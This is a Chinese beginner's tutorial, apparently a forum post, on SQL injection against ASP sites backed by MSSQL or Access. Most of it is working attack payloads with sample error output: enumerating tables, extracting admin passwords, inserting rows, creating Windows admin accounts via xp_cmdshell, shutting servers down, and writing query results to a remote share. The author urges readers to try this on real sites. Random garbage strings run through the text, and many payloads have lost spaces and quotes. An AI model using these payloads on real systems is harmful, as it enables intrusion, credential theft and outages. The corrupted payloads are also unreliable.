[安全]菜鸟SQL注入详解

踏浪行歌

菜鸟SQL注入详解 , z0 V6 W" M" j$ y' m) L ! d& a# A9 ?: w3 t7 T' D3 G, N网上有很多高手GG们写的利用SQL注入如何去黑网站的，偶看了，嘿嘿。 不过可能对于一些初学者而且，有点难。在这里，小林想把这个过时的 1 t9 `2 H0 V5 Q# d, U" h$ M东东作一次全面的交待，尽量让没有编程基础的DDMM们很快的拿握这门技术。 利用SQL进行添加，更改，查看记录。 : H" _% I0 i Q r

当一台主机台开了80端口，当你手头没有任何黑客工具，那么，偶们有SQL。 他不需要你其他东东，只要一个浏览器就够了。HOHO，偶的文章菜菜，偶写这 5 N+ J! E) x" ~! S6 Y, d篇文章只是为了让一些对SQL很陌生的菜菜们看的，老鸟绕道。。。 9 \' L' P1 R- T; n8 Y

1，什么是SQL注入？

SQL注入，就是利用欺骗的方式，通过网页的查询功能，或查询命令注入。 7 [8 ~ r! r. O# X: o* H' g @# O! S当用户来到网站，会提交一些数据，再到数据库进行查询，确定此用户的身份。 举个简单的例子来说吧，你去一个站点的论坛，那么，你会输入你的用户名和 6 n4 F+ \: L" p9 L- e0 S密码，点“确定”，网站会通过数据库的查询来判断你是不是他们的用户， 你的用户名和密码是否正确。而利用SQL注入，通过构造特殊的语句，来查找我 们所想要得到的信息，如管理员的帐号密码。以下，小林用了http://xxx.xxx.com 来表示一个存在注入漏洞的网页。

* R5 {% a' J T3 s' q2，助手篇， 先把IE菜单-工具-Internet选项-高级-显示友好HTTP错误信息前面的勾去掉。 7 k* P, [# [' a3 q- Q6 f8 S7 ~否则，不论服务器返回什么错误，我们都只能看到“HTTP500服务器错误”，不能获得更多的提示信息 . |" ~) f# G0 a7 [, L8 A# }& x

。

5 _! R' y9 P# H, S3，哪些网页能利用？ 我们去找一些要提交数据的网页，如：登陆页面，查找页面，添加页面等 3 r) }! I6 V6 M8 q找到后，如果你注意过网页的源代码，那么，你会发现，他上面一般有一个如下的表单： 3 w) d4 l2 o- t" l4 @0 R0 n3 p

<FORMaction=login.aspmethod=post> <input........ </FORM> 7 N% Y. Z& r2 y' D1 K+ W

这些网页，后缀如asp,jsp,cgi，php网页。 如：http://xxx.xxx.com/index.asp?id=10 1 B" g6 [) q0 Y% T _上面这个例子，就是ASP页后，看到他的ID还的值了吗？是10。一般，我们找的就是这些页面 5 }7 K& {4 I j6 P3 E" u来练手了。（要做个好人噢。（^_^）像小林一样的好人。）

4，怎么测试它是存在注入漏洞的呢？这一步偶称它为“踩点”。 小林有一个毛病，看什么网页，就要顺手在参数（如上面的10）上加一个小小的引号。 5 i3 L/ x1 ?0 ~. j6 ehttp://xxx.xxx.com/index.asp?id=10 ; N; K* N6 G/ Z& [返回错误信息：

MicrosoftOLEDBProviderforSQLServer错误80040e14

字符串之前有未闭合的引号。 ) |. @9 G& y; X* g) I0 o c

/job/grxx.asp，行141

这就是说，他用的是MsSQL数据库。这个引号，导致引号未闭合的错误。本身就是错的，因为 2 A1 \' S# X1 a4 w3 X8 {# r通常一个整数是不用在SQL里加引号的。

如果他不是一个整数而是字母呢？ . R" \1 P' z, E8 r

http://xxx.xxx.com/index.asp?user=lamb

那我们就把引号放到lamb中间，如lamb # s- m/ Z( w! h( i, G呵呵，又出错了吧？

这说明，站点这一部分的代码是大有问题的（当然，就算他有源码公布在网上，我也懒得看） + W% T+ B3 i5 a& j" v6 u; a+ g

当然，我们也可以提交： http://xxx.xxx.com/index.asp?id=10;ANDcolumnaaa=5(注，这里的columnaaa是我乱写的) 8 b4 ~1 `$ M! f+ G# Y/ j( d出现错误信息： 4 K4 G6 g7 T9 I% |! C. A( l, s

MicrosoftOLEDBProviderforODBCDrivers错误80040e14

[Microsoft][ODBCSQLServerDriver][SQLServer]Invalidcolumnnamecolumnaaa.

/job/grxx.asp，行27 ; U8 z% C+ t. u5 F9 D这说明，这是一个SQL，里面没有columnaaa这个字段（我习惯说“列”）。

利用出错的信息，我们现在多少了解了这个站点的服务了吧？

5，现在开工啦，偶不喜欢猜测他的字段名，太浪费TIME了，我们要想办法让数据查询中出错。 要产生一个错误让它自己报出数据库里的值。让我们用一用SQL语法GROUPBY或HAVING。如： ; R! E! }2 ^" b/ \, i

http://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1--

出现错误信息： 6 Z4 @( `" T- Q. j- IMicrosoftOLEDBProviderforODBCDrivers错误80040e14 $ w, v1 s. O/ I5 \

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnarticle.newsidisinvalidinthe 4 g1 Q: N5 O) ]; A- @4 P$ r0 M

selectlistbecauseitisnotcontainedinanaggregatefunctionandthereisnoGROUPBY

clause.

/more.asp，行27

看到article.newsid了吗？说明有一个叫article.newsid的列，因为你在用HAVING，所以你必须还要用

上GROUPBY，于是黑客就重复错误提交，直到没有得到错误。 这里要说明一下：分号在这里分离，%20是空格，--表示后面是一个注释，也就是说只是说明，不能去 3 a$ i4 ~0 Z" }1 G4 j

执行代码。(*_*)

下面是具体例子：

提交： 2 ?" b1 C/ E& T/ i; J" G2 Y/ Chttp://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1-- 得到article.newsid这真是好东西。 提交： http://xxx.xxx.com/job/grxx.asp?id=23%20group%20by%20article.newsid%20having%201=1-- ) o% S5 S/ h) m$ K- V' r) b得到错误信息： # |: M3 f" N% c( Y3 x8 n7 D* zMicrosoftOLEDBProviderforODBCDrivers(0x80040E14) . I0 `7 L) S/ _

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnarticle.titleisinvalidinthe 0 J( G: `! ^& z; f! n

selectlistbecauseitisnotcontainedineitheranaggregatefunctionortheGROUPBY

clause. - t) g/ f" Z5 K' x% @

/more.asp，line20 ) h1 _7 w" C, g: G! [' x

得到： article.title 6 p$ h9 J4 V0 ^我们反复地一个一个加上来提交。 得到错误信息： ( R( b6 i# T; A( p1 \3 |: iMicrosoftOLEDBProviderforODBCDrivers(0x80040E14) $ B4 Q9 W# ?$ C! W

[Microsoft][ODBCSQLServerDriver][SQLServer]Columnadm.userNameisinvalidinthe 9 [* H# B3 l- |) W

selectlistbecauseitisnotcontainedineitheranaggregatefunctionortheGROUPBY 4 g7 x$ h4 c( g* o2 {

clause.

/more.asp，line56

这里要注意了，都到哪儿了？到下一个表了。 6 V8 T2 O+ Z5 s' Y9 R! `0 J! b现在我们知道这里至少有2个表，他们的别名是：adm和article，如里面article对应的是：newsid等 , X8 A1 j5 ^5 D, \! H

title

利用系统表： 7 @, r, H! l* K& \

下面，我们要确定表名来加入数据。 - }4 F$ R& d6 G. J/ S1 F/ ?系统表是MS-SQL2000的一部分，名叫sysObjectstable，我们将要用到查询UNIONSELECT,。 % r/ w' l! D- B3 q3 L% ~要从SysObjectstable有天地拿到表名，一般使用下面语句： ! x! ?$ h& r* A& p1 N0 ISELECTnameFROMsysObjectsWHERExtype=UU是指明定议USER的表。 + C( e9 t0 [% F6 e5 [黑客们已经知道了表里的列， ) H$ n" j9 y+ J! M5 d现在他们能在下面加一些数字。甚至如下面的：

在地址栏里打入：

http://xxx.xxx.com/job/grxx.asp?id=23%20UNION%20ALL%20SELECT%; 201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype=U-- ! a0 {% [! V/ B1 ?记住，上面的，1-6数据中，6是我们想要的。不过有时候会出现数据类型错误， : L7 d7 o# H9 {' Z

http://xxx.xxx.com/job/grxx.asp?id=23%20SELECT;TOP1TABLE_NAMEFROM

INFORMATION_SCHEMA.TABLES-- 8 N/ t9 T4 B* L

MSSQL服务将试图去转换一个string(nvarchar)到integer。那么就会出错：

MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue % i4 S6 c) y) A. T7 _

table1toacolumnofdatatypeint. 1 P; J- F5 N# i/ v# i* A6 Y/index.asp,line5 2 J' ?& a: O. D" m! D. Z6 M3 n

这个错误信息很“友好”地告诉我们string(nvarchar)值不能被转换成integer。 8 e2 i/ x- a* [2 v' @2 J% g7 K这样，我们就获得了数据表的第一个表名！这个表名就是tabel1。

要获得第二个表名，我们继续，用以下查询： http://xxx.xxx.com/job/grxx.asp?id=23%20UNION;SELECTTOP1TABLE_NAMEFROM

INFORMATION_SCHEMA.TABLESWHERETABLE_NAMENOTIN(table1)-- ( w# L% ~" c% S$ D- l

也可以用关键字查找数据： 1 N2 U. K1 N8 ~; ]! g5 t! bhttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1TABLE_NAMEFROM

INFORMATION_SCHEMA.TABLESWHERETABLE_NAMELIKE%25ADMIN%25-- 现在错误信息： 9 g# Y4 ^: N3 F4 CMicrosoftOLEDBProviderforODBCDriverserror80040e07 3 F: {, P. M' f6 \* v& G[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue & I- c- ~& X; G3 h$ O& ]% n

admin_logintoacolumnofdatatypeint. : d; G- i% E3 {3 O# `/index.asp,line5

寻找与之匹配的值，%25ADMIN%25在SQL服务器上将被认作%ADMIN%。这样，我们就能获得符合标 准的表名为"admin_login"的表了。

那么，如何获得表里所有的列表？

我们能利用另一个有用的东东，INFORMATION_SCHEMA.COLUMNS出场！！！ - l( W- H5 V: O8 s3 L& yhttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM * [' I6 }8 L/ h

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_login-- 0 h i% N0 H# ?- Z9 t8 N

现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue 0 @, \8 `, ^. \) \4 {" x# t/ F- ^

u_idtoacolumnofdatatypeint. /index.asp,line6 ) ?( d$ G8 M6 I看，我们有了第一个字段的名，我们用NOTIN()来获得下一个字段名： 2 r- U N P# u; r4 u2 Hhttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_loginWHERECOLUMN_NAMENOTIN

(u_id)-- 9 [$ ~0 w) f, C7 K4 \1 k9 j现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 ( |) K! V* [' d. s; d% w) B[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue - I8 K& I* H4 p1 D) o

u_nametoacolumnofdatatypeint. /index.asp,line5 我们继续，获得其他列表。如："password"等，因为我们获得下面错误信息： 5 E# l l$ X1 [ [( [8 _5 \http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1COLUMN_NAMEFROM # K8 R# s$ X9 |9 Q6 G, n

INFORMATION_SCHEMA.COLUMNSWHERETABLE_NAME=admin_loginWHERECOLUMN_NAMENOTIN 3 T6 h9 p! {+ c5 q6 T; `$ Y2 l

(u_id,u_name,password,contents)-- + N6 C" l5 B; O现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e14 [Microsoft][ODBCSQLServerDriver][SQLServer]ORDERBYitemsmustappearintheselect

listifthestatementcontainsaUNIONoperator. 8 F0 P4 u5 A; f/index.asp,line5 6。2如何找到我们要找的重要数据呢？ 现在我们知道了表名，字段名，我们用相同的方法收集我们要的在数据库里的信息。 3 V; g( m8 |, u d; ^现在，我们从"admin_login"表里取得第一个u_name： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1u_nameFROMadmin_login-- 现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue 2 M3 j# V7 Y. |& s+ _+ A5 u2 S

adminroottoacolumnofdatatypeint. 1 g$ c, Y; t2 {/index.asp,line5

3 }9 s; L5 w) l/ \2 n0 P8 d我们知道，这里有登陆的用户名叫"adminroot"的管理员。最后，从数据库里获得"adminroot"的密码

： http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1passwordFROMadmin_loginwhere

u_name=adminroot-- 1 l( O# l; ?. M& ]- q现在错误信息： MicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue

roottoacolumnofdatatypeint. /index.asp,line5 0 i! o- r, ?" T! r% u; X; o3 L- r我们现在能用户名"adminroot"密码："root"登陆了。

如何取得数字的值？ - L) S8 r& K% Y( K# N: M- I

以上技术描述有有一定的局限性。当我们试图转换文本组成有效的数字0-9我们不能得到任何错误。 3 e$ ?; l i! l& @3 E1 u让我们说说如何获得"tony"的密码，密码是"19840217": http://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1passwordFROMadmin_loginwhere

u_name=tony-- 我们很可能发现，该页无法显示的错误。这结果表示，密码"19840217"被修改到一个数了。在整 合一个整型(10也是)，因为这是一个有效的整合。所以SQL服务就不会给出错误的提示了。 我们就得不到数字的登陆了。 要解决这个问题，我们能附加一些字母来测试转换失败。我们用以下的测试来代替： $ H( }* P; v4 Chttp://xxx.xxx.com/job/grxx.asp?id=23;UNIONSELECTTOP1convert(int,

password%2b%20lambgirl)FROMadmin_loginwhereu_name=tony--

我们简单地利用加号+设置密码数据文件的搜索路径。随便加一些。ASSCII码+=0x2b 我们将添加空格在密码里。所以，如果把我们的密码是19840217。他将变成19840217lambgirl. ~+ J0 s. j" D, F Q5 z7 ]# c$ V调出了转换了的函数。试着将19840217lambgirl转变成整型。SQL服务将出现ODBC错误： j# K0 I1 x3 }- lMicrosoftOLEDBProviderforODBCDriverserror80040e07 [Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue + i R* s6 h) V) x3 m

19840217lambgirltoacolumnofdatatypeint. /index.asp,line5 - ~1 P. j! k# m/ m7 J! V9 @5 ?现在，你就能用tony和密码：19840217lambgirl了。 ( d/ Z! _: e# D

如何在数据库修改，插入数据？ 当我们成功地获得了表名，字段。就很容易在数据库里修改甚至插入新的数据。如更改"adminroot" / M! a/ ~. y0 D+ N的密码，我们 8 {* ^) [& g8 O3 p. D* r

http://xxx.xxx.com/job/grxx.asp?id=23;UPDATEadmin_loginSETpassword=newpas5WHERE ( R7 Q4 H) r9 F t. |5 ?

u_name=adminroot--

要在数据表里插入新记录， " d, O, X% }$ q9 ^6 O* h# u

http://xxx.xxx.com/job/grxx.asp?id=23;INSERTINTOadmin_login(u_id,u_name, 2 `% C3 \, N: {3 V

password,contents)VALUES(123,xiaolin,pas,lambgirl)-- % H8 F) s8 Z& G' O u. k! _) ?现在，我们就能用xiaolinpas来登陆了。

如何远程执行SQL漏洞？ # {4 k/ `2 w# y3 d' l! _0 _9 u. h

能进行SQL注入命令表明，我们能查任何我们想要查的。默认安装的的MSSQL服务 % @, H1 u: [3 r/ N( a: _ I在系统中权限等于管理员。我们能利用执行存储过程像xp_cmdshell来执行远程破坏： ;execmaster..xp_cmdshellping192.168.0.2--

(如果单引号不能用，就换成双引号)

分号表示结束前面的SQL查询，从而允许你开始另一个新的SQL命令。 为了检验命令成功执行，你可以监听从192.168.0.2发出的的ICMP包。查看是否发出包。 5 C# o7 o/ O" b; a3 a. g' `) X' k9 P

#tcpdumpicmp & f& p9 v3 g' v6 s+ i如果你没有接到PING主机的回应，得到一个错误的提示，权限错误，那么，很可能管理员 限制了WEB用户对xp_cmdshell等的权限。

如何找出MYSQL查询结果？ : x( q" Q. Q1 C这很容易用sp_makewebtask来把你查询的结果放到一个HTML里： 2 E2 ]/ f# h+ a! U( e/ M;EXECmaster..sp_makewebtask"\\192.168.0.2\share\girlxiaolin.html","SELECT*FROM 2 O0 X3 F$ S! }! L/ }7 H8 t9 j* O

INFORMATION_SCHEMA.TABLES" : ?) C! C M* { W% P但是目标IP必须共享文件夹。 + T" M& S. ^9 a" D# j3 }+ i

+ Z) H2 ]0 w( d' ~, t- l- _% Ehttp://xxx.xxx.com/job/grxx.asp?id=23;;execmaster..xp_cmdshell“netusername password/add”--

xp_cmdshell用于调用系统命令，于是，用net命令新建了用户名为name、密码为password 的windows的帐号，接着： ! [+ | g O, a/ @7 Ihttp://xxx.xxx.com/job/grxx.asp?id=23;;execmaster..xp_cmdshell“netlocalgroupname

administrators/add”-- 9 c' I& [* |! ?0 d; }) U将新建的帐号name加入管理员组，不过这种方法只于用sa连接数据库的情况，否则，没有权限调用

xp_cmdshell。 # u- O3 e+ l- O M+ W9 k i9 n0 h

其他方面，如利用SQL的命令填写： 0 ?" L- E3 k4 W7 ]$ C: I将使SQL服务快速关闭 6 ^8 Q7 |( P( T& Q3 a: s7 H3 e- ~用户名:;shutdownwithnowait;-- 9 F* [- }' A7 X密码:不填

导致严重问题，网络故障。 : B f; i- Z4 j6 O. e用户名:;execmaster..xp_cmdshelliisreset;-- ! W5 J, D O, ~& w密码：不填

关于ACCESS部分， " q5 Z" i0 W# I+ {

和ASSQL差不了多少，也是先在http://xxx.xxx.com/index.asp?id=10

出错的话，继续提交： & B. K/ j$ }( S5 d3 z/ w先测试是否有ADMIN表， http://xxx.xxx.com/index.asp?id=10and0<>(selectcount(*)fromadmin) . x$ k8 a" Y- l

http://xxx.xxx.com/index.asp?id=10and1=(selectcount(*)fromadmin) - \* N `" A/ W/ E. m6 X没有的话，就换一个名字，如user啊，什么的。再猜里面是否有username这个字段. % r d6 ~, M+ Q

and1=(selectcount(*)fromadminwherelen(username)>0) I# d6 ?% h/ d& n' t如果出错，同理，我们也可以给它换一个名字。 ' j# a, C& o1 U$ p! O2 ^! t接下来我们猜用户的具体名字。 and1=(selectcount(*)fromadminwhereleft(username,1)=l) 这时我们可以一个一个地来猜。 and1=(selectcount(*)fromadminwhereleft(username,2)=la) 接下来猜密码，猜密码的道理同猜用户名一样。 and1=(selectcount(*)fromadminwhereleft(password,1)=l)

好了，不写了，这篇文章小林写了好几天了，累死了，还是条理不清楚。 文章还有很多不全面的地方。还有一些专业术语，小林可能也有误，不过小菜们拿来看看还 是行的啦。如果哪些写错了，请老鸟们加偶：165442496，告诉我错误，我会修正的。 我试过了，很多用MsSQL站点过滤不完整的网上也很多。所以大家可以找来练练手。 + g: V' j3 p0 f% ^8 O3 ?. e& N* H

[em09]